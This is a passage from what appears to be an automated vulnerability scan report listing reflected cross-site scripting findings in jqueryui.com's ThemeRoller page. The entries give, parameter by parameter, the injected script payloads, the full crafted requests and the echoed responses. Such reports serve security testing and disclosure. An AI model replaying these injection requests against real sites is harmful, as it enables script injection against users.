GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=7593e7f"><script>alert(1)</script>6bb1c029358&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:04 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=7593e7f"><script>alert(1)</script>6bb1c029358&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=22
...[SNIP]...

2.134. http://jqueryui.com/themeroller/ [bgImgOpacityHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab27f"><script>alert(1)</script>a6e6f66d6d2 was submitted in the bgImgOpacityHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55ab27f"><script>alert(1)</script>a6e6f66d6d2&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:45 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55ab27f"><script>alert(1)</script>a6e6f66d6d2&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a
...[SNIP]...

2.135. http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16ebb"><script>alert(1)</script>14f1893d8d7 was submitted in the bgImgOpacityHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=7516ebb"><script>alert(1)</script>14f1893d8d7&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:30 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=7516ebb"><script>alert(1)</script>14f1893d8d7&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgC
...[SNIP]...

2.136. http://jqueryui.com/themeroller/ [bgImgOpacityOverlay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4bcf0"><script>alert(1)</script>b47e37778d5 was submitted in the bgImgOpacityOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=04bcf0"><script>alert(1)</script>b47e37778d5&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:30:00 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=04bcf0"><script>alert(1)</script>b47e37778d5&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="te
...[SNIP]...

2.137. http://jqueryui.com/themeroller/ [bgImgOpacityShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2940e"><script>alert(1)</script>bb65b2d20eb was submitted in the bgImgOpacityShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=02940e"><script>alert(1)</script>bb65b2d20eb&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:30:05 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=02940e"><script>alert(1)</script>bb65b2d20eb&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

2.138. http://jqueryui.com/themeroller/ [bgTextureActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 230d2"><script>alert(1)</script>ddcbe0b8022 was submitted in the bgTextureActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png230d2"><script>alert(1)</script>ddcbe0b8022&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:35 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
onColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png230d2"><script>alert(1)</script>ddcbe0b8022&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHig
...[SNIP]...

2.139. http://jqueryui.com/themeroller/ [bgTextureContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 668dd"><script>alert(1)</script>346464947ea was submitted in the bgTextureContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png668dd"><script>alert(1)</script>346464947ea&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:08 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
s=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png668dd"><script>alert(1)</script>346464947ea&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault
...[SNIP]...

2.140. http://jqueryui.com/themeroller/ [bgTextureDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9503"><script>alert(1)</script>a459dcc6533 was submitted in the bgTextureDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.pngb9503"><script>alert(1)</script>a459dcc6533&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:22 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
r=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.pngb9503"><script>alert(1)</script>a459dcc6533&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&ic
...[SNIP]...

2.141. http://jqueryui.com/themeroller/ [bgTextureError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b47ff"><script>alert(1)</script>ce132596418 was submitted in the bgTextureError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.pngb47ff"><script>alert(1)</script>ce132596418&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:52 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.pngb47ff"><script>alert(1)</script>ce132596418&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgText
...[SNIP]...

2.142. http://jqueryui.com/themeroller/ [bgTextureHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a07fc"><script>alert(1)</script>513a07b8f38 was submitted in the bgTextureHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.pnga07fc"><script>alert(1)</script>513a07b8f38&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aa